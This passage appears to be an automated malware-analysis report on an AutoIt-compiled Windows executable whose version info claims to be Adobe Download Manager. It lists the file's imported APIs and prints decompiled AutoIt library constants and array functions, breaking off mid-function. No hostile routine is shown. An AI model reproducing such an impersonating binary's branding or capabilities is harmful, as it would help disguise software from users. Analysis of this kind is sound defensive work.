AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
LegalCopyright	Copyright 2018 Adobe Incorporated. All rights reserved.
FileVersion	...
CompanyName	Adobe Systems Incorporated
ProductName	Adobe Download Manager
ProductVersion	...
FileDescription	Adobe Download Manager
OriginalFilename	Adobe Download Manager
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Static AutoIT Info

General

Code:

GLOBAL CONST $OPT_COORDSRELATIVE = 0 GLOBAL CONST $OPT_COORDSABSOLUTE = 1 GLOBAL CONST $OPT_COORDSCLIENT = 2 GLOBAL CONST $OPT_ERRORSILENT = 0 GLOBAL CONST $OPT_ERRORFATAL = 1 GLOBAL CONST $OPT_CAPSNOSTORE = 0 GLOBAL CONST $OPT_CAPSSTORE = 1 GLOBAL CONST $OPT_MATCHSTART = 1 GLOBAL CONST $OPT_MATCHANY = 2 GLOBAL CONST $OPT_MATCHEXACT = 3 GLOBAL CONST $OPT_MATCHADVANCED = 4 GLOBAL CONST $CCS_TOP = 1 GLOBAL CONST $CCS_NOMOVEY = 2 GLOBAL CONST $CCS_BOTTOM = 3 GLOBAL CONST $CCS_NORESIZE = 4 GLOBAL CONST $CCS_NOPARENTALIGN = 8 GLOBAL CONST $CCS_NOHILITE = 16 GLOBAL CONST $CCS_ADJUSTABLE = 32 GLOBAL CONST $CCS_NODIVIDER = 64 GLOBAL CONST $CCS_VERT = 128 GLOBAL CONST $CCS_LEFT = 129 GLOBAL CONST $CCS_NOMOVEX = 130 GLOBAL CONST $CCS_RIGHT = 131 GLOBAL CONST $DT_DRIVETYPE = 1 GLOBAL CONST $DT_SSDSTATUS = 2 GLOBAL CONST $DT_BUSTYPE = 3 GLOBAL CONST $PROXY_IE = 0 GLOBAL CONST $PROXY_NONE = 1 GLOBAL CONST $PROXY_SPECIFIED = 2 GLOBAL CONST $OBJID_WINDOW = 0 GLOBAL CONST $OBJID_TITLEBAR = 4294967294 GLOBAL CONST $OBJID_SIZEGRIP = 4294967289 GLOBAL CONST $OBJID_CARET = 4294967288 GLOBAL CONST $OBJID_CURSOR = 4294967287 GLOBAL CONST $OBJID_ALERT = 4294967286 GLOBAL CONST $OBJID_SOUND = 4294967285 GLOBAL CONST $DLG_CENTERONTOP = 0 GLOBAL CONST $DLG_NOTITLE = 1 GLOBAL CONST $DLG_NOTONTOP = 2 GLOBAL CONST $DLG_TEXTLEFT = 4 GLOBAL CONST $DLG_TEXTRIGHT = 8 GLOBAL CONST $DLG_MOVEABLE = 16 GLOBAL CONST $DLG_TEXTVCENTER = 32 GLOBAL CONST $IDC_UNKNOWN = 0 GLOBAL CONST $IDC_APPSTARTING = 1 GLOBAL CONST $IDC_ARROW = 2 GLOBAL CONST $IDC_CROSS = 3 GLOBAL CONST $IDC_HAND = 32649 GLOBAL CONST $IDC_HELP = 4 GLOBAL CONST $IDC_IBEAM = 5 GLOBAL CONST $IDC_ICON = 6 GLOBAL CONST $IDC_NO = 7 GLOBAL CONST $IDC_SIZE = 8 GLOBAL CONST $IDC_SIZEALL = 9 GLOBAL CONST $IDC_SIZENESW = 10 GLOBAL CONST $IDC_SIZENS = 11 GLOBAL CONST $IDC_SIZENWSE = 12 GLOBAL CONST $IDC_SIZEWE = 13 GLOBAL CONST $IDC_UPARROW = 14 GLOBAL CONST $IDC_WAIT = 15 GLOBAL CONST $IDI_APPLICATION = 32512 GLOBAL CONST $IDI_ASTERISK = 32516 GLOBAL CONST $IDI_EXCLAMATION = 32515 GLOBAL CONST $IDI_HAND = 32513 GLOBAL CONST $IDI_QUESTION = 32514 GLOBAL CONST $IDI_WINLOGO = 32517 GLOBAL CONST $IDI_SHIELD = 32518 GLOBAL CONST $IDI_ERROR = $IDI_HAND GLOBAL CONST $IDI_INFORMATION = $IDI_ASTERISK GLOBAL CONST $IDI_WARNING = $IDI_EXCLAMATION GLOBAL CONST $SD_LOGOFF = 0 GLOBAL CONST $SD_SHUTDOWN = 1 GLOBAL CONST $SD_REBOOT = 2 GLOBAL CONST $SD_FORCE = 4 GLOBAL CONST $SD_POWERDOWN = 8 GLOBAL CONST $SD_FORCEHUNG = 16 GLOBAL CONST $SD_STANDBY = 32 GLOBAL CONST $SD_HIBERNATE = 64 GLOBAL CONST $STDIN_CHILD = 1 GLOBAL CONST $STDOUT_CHILD = 2 GLOBAL CONST $STDERR_CHILD = 4 GLOBAL CONST $STDERR_MERGED = 8 GLOBAL CONST $STDIO_INHERIT_PARENT = 16 GLOBAL CONST $RUN_CREATE_NEW_CONSOLE = 65536 GLOBAL CONST $UBOUND_DIMENSIONS = 0 GLOBAL CONST $UBOUND_ROWS = 1 GLOBAL CONST $UBOUND_COLUMNS = 2 GLOBAL CONST $MOUSEEVENTF_ABSOLUTE = 32768 GLOBAL CONST $MOUSEEVENTF_MOVE = 1 GLOBAL CONST $MOUSEEVENTF_LEFTDOWN = 2 GLOBAL CONST $MOUSEEVENTF_LEFTUP = 4 GLOBAL CONST $MOUSEEVENTF_RIGHTDOWN = 8 GLOBAL CONST $MOUSEEVENTF_RIGHTUP = 16 GLOBAL CONST $MOUSEEVENTF_MIDDLEDOWN = 32 GLOBAL CONST $MOUSEEVENTF_MIDDLEUP = 64 GLOBAL CONST $MOUSEEVENTF_WHEEL = 2048 GLOBAL CONST $MOUSEEVENTF_XDOWN = 128 GLOBAL CONST $MOUSEEVENTF_XUP = 256 GLOBAL CONST $REG_NONE = 0 GLOBAL CONST $REG_SZ = 1 GLOBAL CONST $REG_EXPAND_SZ = 2 GLOBAL CONST $REG_BINARY = 3 GLOBAL CONST $REG_DWORD = 4 GLOBAL CONST $REG_DWORD_LITTLE_ENDIAN = 4 GLOBAL CONST $REG_DWORD_BIG_ENDIAN = 5 GLOBAL CONST $REG_LINK = 6 GLOBAL CONST $REG_MULTI_SZ = 7 GLOBAL CONST $REG_RESOURCE_LIST = 8 GLOBAL CONST $REG_FULL_RESOURCE_DESCRIPTOR = 9 GLOBAL CONST $REG_RESOURCE_REQUIREMENTS_LIST = 10 GLOBAL CONST $REG_QWORD = 11 GLOBAL CONST $REG_QWORD_LITTLE_ENDIAN = 11 GLOBAL CONST $HWND_BOTTOM = 1 GLOBAL CONST $HWND_NOTOPMOST = + 4294967294 GLOBAL CONST $HWND_TOP = 0 GLOBAL CONST $HWND_TOPMOST = + 4294967295 GLOBAL CONST $SWP_NOSIZE = 1 GLOBAL CONST $SWP_NOMOVE = 2 GLOBAL CONST $SWP_NOZORDER = 4 GLOBAL CONST $SWP_NOREDRAW = 8 GLOBAL CONST $SWP_NOACTIVATE = 16 GLOBAL CONST $SWP_FRAMECHANGED = 32 GLOBAL CONST $SWP_DRAWFRAME = 32 GLOBAL CONST $SWP_SHOWWINDOW = 64 GLOBAL CONST $SWP_HIDEWINDOW = 128 GLOBAL CONST $SWP_NOCOPYBITS = 256 GLOBAL CONST $SWP_NOOWNERZORDER = 512 GLOBAL CONST $SWP_NOREPOSITION = 512 GLOBAL CONST $SWP_NOSENDCHANGING = 1024 GLOBAL CONST $SWP_DEFERERASE = 8192 GLOBAL CONST $SWP_ASYNCWINDOWPOS = 16384 GLOBAL CONST $KEYWORD_DEFAULT = 1 GLOBAL CONST $KEYWORD_NULL = 2 GLOBAL CONST $DECLARED_LOCAL = + 4294967295 GLOBAL CONST $DECLARED_UNKNOWN = 0 GLOBAL CONST $DECLARED_GLOBAL = 1 GLOBAL CONST $ASSIGN_CREATE = 0 GLOBAL CONST $ASSIGN_FORCELOCAL = 1 GLOBAL CONST $ASSIGN_FORCEGLOBAL = 2 GLOBAL CONST $ASSIGN_EXISTFAIL = 4 GLOBAL CONST $BI_ENABLE = 0 GLOBAL CONST $BI_DISABLE = 1 GLOBAL CONST $BREAK_ENABLE = 1 GLOBAL CONST $BREAK_DISABLE = 0 GLOBAL CONST $CDTRAY_OPEN = "open" GLOBAL CONST $CDTRAY_CLOSED = "closed" GLOBAL CONST $SEND_DEFAULT = 0 GLOBAL CONST $SEND_RAW = 1 GLOBAL CONST $DIR_DEFAULT = 0 GLOBAL CONST $DIR_EXTENDED = 1 GLOBAL CONST $DIR_NORECURSE = 2 GLOBAL CONST $DIR_REMOVE = 1 GLOBAL CONST $DT_ALL = "ALL" GLOBAL CONST $DT_CDROM = "CDROM" GLOBAL CONST $DT_REMOVABLE = "REMOVABLE" GLOBAL CONST $DT_FIXED = "FIXED" GLOBAL CONST $DT_NETWORK = "NETWORK" GLOBAL CONST $DT_RAMDISK = "RAMDISK" GLOBAL CONST $DT_UNKNOWN = "UNKNOWN" GLOBAL CONST $DT_UNDEFINED = 1 GLOBAL CONST $DT_FAT = "FAT" GLOBAL CONST $DT_FAT32 = "FAT32" GLOBAL CONST $DT_EXFAT = "exFAT" GLOBAL CONST $DT_NTFS = "NTFS" GLOBAL CONST $DT_NWFS = "NWFS" GLOBAL CONST $DT_CDFS = "CDFS" GLOBAL CONST $DT_UDF = "UDF" GLOBAL CONST $DMA_DEFAULT = 0 GLOBAL CONST $DMA_PERSISTENT = 1 GLOBAL CONST $DMA_AUTHENTICATION = 8 GLOBAL CONST $DS_UNKNOWN = "UNKNOWN" GLOBAL CONST $DS_READY = "READY" GLOBAL CONST $DS_NOTREADY = "NOTREADY" GLOBAL CONST $DS_INVALID = "INVALID" GLOBAL CONST $MOUSE_CLICK_LEFT = "left" GLOBAL CONST $MOUSE_CLICK_RIGHT = "right" GLOBAL CONST $MOUSE_CLICK_MIDDLE = "middle" GLOBAL CONST $MOUSE_CLICK_MAIN = "main" GLOBAL CONST $MOUSE_CLICK_MENU = "menu" GLOBAL CONST $MOUSE_CLICK_PRIMARY = "primary" GLOBAL CONST $MOUSE_CLICK_SECONDARY = "secondary" GLOBAL CONST $MOUSE_WHEEL_UP = "up" GLOBAL CONST $MOUSE_WHEEL_DOWN = "down" GLOBAL CONST $NUMBER_AUTO = 0 GLOBAL CONST $NUMBER_32BIT = 1 GLOBAL CONST $NUMBER_64BIT = 2 GLOBAL CONST $NUMBER_DOUBLE = 3 GLOBAL CONST $OBJ_NAME = 1 GLOBAL CONST $OBJ_STRING = 2 GLOBAL CONST $OBJ_PROGID = 3 GLOBAL CONST $OBJ_FILE = 4 GLOBAL CONST $OBJ_MODULE = 5 GLOBAL CONST $OBJ_CLSID = 6 GLOBAL CONST $OBJ_IID = 7 GLOBAL CONST $EXITCLOSE_NORMAL = 0 GLOBAL CONST $EXITCLOSE_BYEXIT = 1 GLOBAL CONST $EXITCLOSE_BYCLICK = 2 GLOBAL CONST $EXITCLOSE_BYLOGOFF = 3 GLOBAL CONST $EXITCLOSE_BYSUTDOWN = 4 GLOBAL CONST $PROCESS_STATS_MEMORY = 0 GLOBAL CONST $PROCESS_STATS_IO = 1 GLOBAL CONST $PROCESS_LOW = 0 GLOBAL CONST $PROCESS_BELOWNORMAL = 1 GLOBAL CONST $PROCESS_NORMAL = 2 GLOBAL CONST $PROCESS_ABOVENORMAL = 3 GLOBAL CONST $PROCESS_HIGH = 4 GLOBAL CONST $PROCESS_REALTIME = 5 GLOBAL CONST $RUN_LOGON_NOPROFILE = 0 GLOBAL CONST $RUN_LOGON_PROFILE = 1 GLOBAL CONST $RUN_LOGON_NETWORK = 2 GLOBAL CONST $RUN_LOGON_INHERIT = 4 GLOBAL CONST $SOUND_NOWAIT = 0 GLOBAL CONST $SOUND_WAIT = 1 GLOBAL CONST $SHEX_OPEN = "open" GLOBAL CONST $SHEX_EDIT = "edit" GLOBAL CONST $SHEX_PRINT = "print" GLOBAL CONST $SHEX_PROPERTIES = "properties" GLOBAL CONST $TCP_DATA_DEFAULT = 0 GLOBAL CONST $TCP_DATA_BINARY = 1 GLOBAL CONST $UDP_OPEN_DEFAULT = 0 GLOBAL CONST $UDP_OPEN_BROADCAST = 1 GLOBAL CONST $UDP_DATA_DEFAULT = 0 GLOBAL CONST $UDP_DATA_BINARY = 1 GLOBAL CONST $UDP_DATA_ARRAY = 2 GLOBAL CONST $TIP_NOICON = 0 GLOBAL CONST $TIP_INFOICON = 1 GLOBAL CONST $TIP_WARNINGICON = 2 GLOBAL CONST $TIP_ERRORICON = 3 GLOBAL CONST $TIP_BALLOON = 1 GLOBAL CONST $TIP_CENTER = 2 GLOBAL CONST $TIP_FORCEVISIBLE = 4 GLOBAL CONST $WINDOWS_NOONTOP = 0 GLOBAL CONST $WINDOWS_ONTOP = 1 GLOBAL CONST $MB_OK = 0 GLOBAL CONST $MB_OKCANCEL = 1 GLOBAL CONST $MB_ABORTRETRYIGNORE = 2 GLOBAL CONST $MB_YESNOCANCEL = 3 GLOBAL CONST $MB_YESNO = 4 GLOBAL CONST $MB_RETRYCANCEL = 5 GLOBAL CONST $MB_CANCELTRYCONTINUE = 6 GLOBAL CONST $MB_HELP = 16384 GLOBAL CONST $MB_ICONSTOP = 16 GLOBAL CONST $MB_ICONERROR = 16 GLOBAL CONST $MB_ICONHAND = 16 GLOBAL CONST $MB_ICONQUESTION = 32 GLOBAL CONST $MB_ICONEXCLAMATION = 48 GLOBAL CONST $MB_ICONWARNING = 48 GLOBAL CONST $MB_ICONINFORMATION = 64 GLOBAL CONST $MB_ICONASTERISK = 64 GLOBAL CONST $MB_USERICON = 128 GLOBAL CONST $MB_DEFBUTTON1 = 0 GLOBAL CONST $MB_DEFBUTTON2 = 256 GLOBAL CONST $MB_DEFBUTTON3 = 512 GLOBAL CONST $MB_DEFBUTTON4 = 768 GLOBAL CONST $MB_APPLMODAL = 0 GLOBAL CONST $MB_SYSTEMMODAL = 4096 GLOBAL CONST $MB_TASKMODAL = 8192 GLOBAL CONST $MB_DEFAULT_DESKTOP_ONLY = 131072 GLOBAL CONST $MB_RIGHT = 524288 GLOBAL CONST $MB_RTLREADING = 1048576 GLOBAL CONST $MB_SETFOREGROUND = 65536 GLOBAL CONST $MB_TOPMOST = 262144 GLOBAL CONST $MB_SERVICE_NOTIFICATION = 2097152 GLOBAL CONST $MB_RIGHTJUSTIFIED = $MB_RIGHT GLOBAL CONST $IDTIMEOUT = + 4294967295 GLOBAL CONST $IDOK = 1 GLOBAL CONST $IDCANCEL = 2 GLOBAL CONST $IDABORT = 3 GLOBAL CONST $IDRETRY = 4 GLOBAL CONST $IDIGNORE = 5 GLOBAL CONST $IDYES = 6 GLOBAL CONST $IDNO = 7 GLOBAL CONST $IDCLOSE = 8 GLOBAL CONST $IDHELP = 9 GLOBAL CONST $IDTRYAGAIN = 10 GLOBAL CONST $IDCONTINUE = 11 GLOBAL CONST $STR_NOCASESENSE = 0 GLOBAL CONST $STR_CASESENSE = 1 GLOBAL CONST $STR_NOCASESENSEBASIC = 2 GLOBAL CONST $STR_STRIPLEADING = 1 GLOBAL CONST $STR_STRIPTRAILING = 2 GLOBAL CONST $STR_STRIPSPACES = 4 GLOBAL CONST $STR_STRIPALL = 8 GLOBAL CONST $STR_CHRSPLIT = 0 GLOBAL CONST $STR_ENTIRESPLIT = 1 GLOBAL CONST $STR_NOCOUNT = 2 GLOBAL CONST $STR_REGEXPMATCH = 0 GLOBAL CONST $STR_REGEXPARRAYMATCH = 1 GLOBAL CONST $STR_REGEXPARRAYFULLMATCH = 2 GLOBAL CONST $STR_REGEXPARRAYGLOBALMATCH = 3 GLOBAL CONST $STR_REGEXPARRAYGLOBALFULLMATCH = 4 GLOBAL CONST $STR_ENDISSTART = 0 GLOBAL CONST $STR_ENDNOTSTART = 1 GLOBAL CONST $SB_ANSI = 1 GLOBAL CONST $SB_UTF16LE = 2 GLOBAL CONST $SB_UTF16BE = 3 GLOBAL CONST $SB_UTF8 = 4 GLOBAL CONST $SE_UTF16 = 0 GLOBAL CONST $SE_ANSI = 1 GLOBAL CONST $SE_UTF8 = 2 GLOBAL CONST $STR_UTF16 = 0 GLOBAL CONST $STR_UCS2 = 1 GLOBAL ENUM $ARRAYFILL_FORCE_DEFAULT , $ARRAYFILL_FORCE_SINGLEITEM , $ARRAYFILL_FORCE_INT , $ARRAYFILL_FORCE_NUMBER , $ARRAYFILL_FORCE_PTR , $ARRAYFILL_FORCE_HWND , $ARRAYFILL_FORCE_STRING GLOBAL ENUM $ARRAYUNIQUE_NOCOUNT , $ARRAYUNIQUE_COUNT GLOBAL ENUM $ARRAYUNIQUE_AUTO , $ARRAYUNIQUE_FORCE32 , $ARRAYUNIQUE_FORCE64 , $ARRAYUNIQUE_MATCH , $ARRAYUNIQUE_DISTINCT FUNC _ARRAYADD (BYREF $AARRAY , $VVALUE , $ISTART = 0 , $SDELIM_ITEM = "|" , $SDELIM_ROW = @CRLF , $IFORCE = $ARRAYFILL_FORCE_DEFAULT ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $SDELIM_ITEM = DEFAULT THEN $SDELIM_ITEM = "|" IF $SDELIM_ROW = DEFAULT THEN $SDELIM_ROW = @CRLF IF $IFORCE = DEFAULT THEN $IFORCE = $ARRAYFILL_FORCE_DEFAULT IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) LOCAL $HDATATYPE = 0 SWITCH $IFORCE CASE $ARRAYFILL_FORCE_INT $HDATATYPE = INT CASE $ARRAYFILL_FORCE_NUMBER $HDATATYPE = NUMBER CASE $ARRAYFILL_FORCE_PTR $HDATATYPE = PTR CASE $ARRAYFILL_FORCE_HWND $HDATATYPE = HWND CASE $ARRAYFILL_FORCE_STRING $HDATATYPE = STRING ENDSWITCH SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IFORCE = $ARRAYFILL_FORCE_SINGLEITEM THEN REDIM $AARRAY [$IDIM_1 + 1 ] $AARRAY [$IDIM_1 ] = $VVALUE RETURN $IDIM_1 ENDIF IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $HDATATYPE = 0 ELSE LOCAL $ATMP = STRINGSPLIT ($VVALUE , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) IF UBOUND ($ATMP , $UBOUND_ROWS ) = 1 THEN $ATMP [0 ] = $VVALUE ENDIF $VVALUE = $ATMP ENDIF LOCAL $IADD = UBOUND ($VVALUE , $UBOUND_ROWS ) REDIM $AARRAY [$IDIM_1 + $IADD ] FOR $I = 0 TO $IADD + 4294967295 IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$IDIM_1 + $I ] = $HDATATYPE ($VVALUE [$I ] ) ELSE $AARRAY [$IDIM_1 + $I ] = $VVALUE [$I ] ENDIF NEXT RETURN $IDIM_1 + $IADD + 4294967295 CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ISTART < 0 OR $ISTART > $IDIM_2 + 4294967295 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IVALDIM_1 , $IVALDIM_2 = 0 , $ICOLCOUNT IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $IVALDIM_1 = UBOUND ($VVALUE , $UBOUND_ROWS ) $IVALDIM_2 = UBOUND ($VVALUE , $UBOUND_COLUMNS ) $HDATATYPE = 0 ELSE LOCAL $ASPLIT_1 = STRINGSPLIT ($VVALUE , $SDELIM_ROW , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $IVALDIM_1 = UBOUND ($ASPLIT_1 , $UBOUND_ROWS ) LOCAL $ATMP [$IVALDIM_1 ] [0 ] , $ASPLIT_2 FOR $I = 0 TO $IVALDIM_1 + 4294967295 $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $ICOLCOUNT = UBOUND ($ASPLIT_2 ) IF $ICOLCOUNT > $IVALDIM_2 THEN $IVALDIM_2 = $ICOLCOUNT REDIM $ATMP [$IVALDIM_1 ] [$IVALDIM_2 ] ENDIF FOR $J = 0 TO $ICOLCOUNT + 4294967295 $ATMP [$I ] [$J ] = $ASPLIT_2 [$J ] NEXT NEXT $VVALUE = $ATMP ENDIF IF UBOUND ($VVALUE , $UBOUND_COLUMNS ) + $ISTART > UBOUND ($AARRAY , $UBOUND_COLUMNS ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 + $IVALDIM_1 ] [$IDIM_2 ] FOR $IWRITETO_INDEX = 0 TO $IVALDIM_1 + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 IF $J < $ISTART THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = "" ELSEIF $J - $ISTART > $IVALDIM_2 + 4294967295 THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = "" ELSE IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = $HDATATYPE ($VVALUE [$IWRITETO_INDEX ] [$J - $ISTART ] ) ELSE $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = $VVALUE [$IWRITETO_INDEX ] [$J - $ISTART ] ENDIF ENDIF NEXT NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 ENDFUNC FUNC _ARRAYBINARYSEARCH (CONST BYREF $AARRAY , $VVALUE , $ISTART = 0 , $IEND = 0 , $ICOLUMN = 0 ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ICOLUMN = DEFAULT THEN $ICOLUMN = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF $IDIM_1 = 0 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $IEND < 1 OR $IEND > $IDIM_1 + 4294967295 THEN $IEND = $IDIM_1 + 4294967295 IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IMID = INT (($IEND + $ISTART ) / 2 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $AARRAY [$ISTART ] > $VVALUE OR $AARRAY [$IEND ] < $VVALUE THEN RETURN SETERROR (2 , 0 , + 4294967295 ) WHILE $ISTART <= $IMID AND $VVALUE <> $AARRAY [$IMID ] IF $VVALUE < $AARRAY [$IMID ] THEN $IEND = $IMID + 4294967295 ELSE $ISTART = $IMID + 1 ENDIF $IMID = INT (($IEND + $ISTART ) / 2 ) WEND IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 THEN RETURN SETERROR (7 , 0 , + 4294967295 ) IF $AARRAY [$ISTART ] [$ICOLUMN ] > $VVALUE OR $AARRAY [$IEND ] [$ICOLUMN ] < $VVALUE THEN RETURN SETERROR (2 , 0 , + 4294967295 ) WHILE $ISTART <= $IMID AND $VVALUE <> $AARRAY [$IMID ] [$ICOLUMN ] IF $VVALUE < $AARRAY [$IMID ] [$ICOLUMN ] THEN $IEND = $IMID + 4294967295 ELSE $ISTART = $IMID + 1 ENDIF $IMID = INT (($IEND + $ISTART ) / 2 ) WEND IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) CASE ELSE RETURN SETERROR (5 , 0 , + 4294967295 ) ENDSWITCH RETURN $IMID ENDFUNC FUNC _ARRAYCOLDELETE (BYREF $AARRAY , $ICOLUMN , $BCONVERT = FALSE ) IF $BCONVERT = DEFAULT THEN $BCONVERT = FALSE IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) SWITCH $IDIM_2 CASE 2 IF $ICOLUMN < 0 OR $ICOLUMN > 1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $BCONVERT THEN LOCAL $ATEMPARRAY [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 $ATEMPARRAY [$I ] = $AARRAY [$I ] [(NOT $ICOLUMN ) ] NEXT $AARRAY = $ATEMPARRAY ELSE CONTINUECASE ENDIF CASE ELSE IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $ICOLUMN TO $IDIM_2 + 4294967294 $AARRAY [$I ] [$J ] = $AARRAY [$I ] [$J + 1 ] NEXT NEXT REDIM $AARRAY [$IDIM_1 ] [$IDIM_2 + 4294967295 ] ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_COLUMNS ) ENDFUNC FUNC _ARRAYCOLINSERT (BYREF $AARRAY , $ICOLUMN ) IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 LOCAL $ATEMPARRAY [$IDIM_1 ] [2 ] SWITCH $ICOLUMN CASE 0 , 1 FOR $I = 0 TO $IDIM_1 + 4294967295 $ATEMPARRAY [$I ] [(NOT $ICOLUMN ) ] = $AARRAY [$I ] NEXT CASE ELSE RETURN SETERROR (3 , 0 , + 4294967295 ) ENDSWITCH $AARRAY = $ATEMPARRAY CASE 2 LOCAL $IDIM_2 = UBOUND 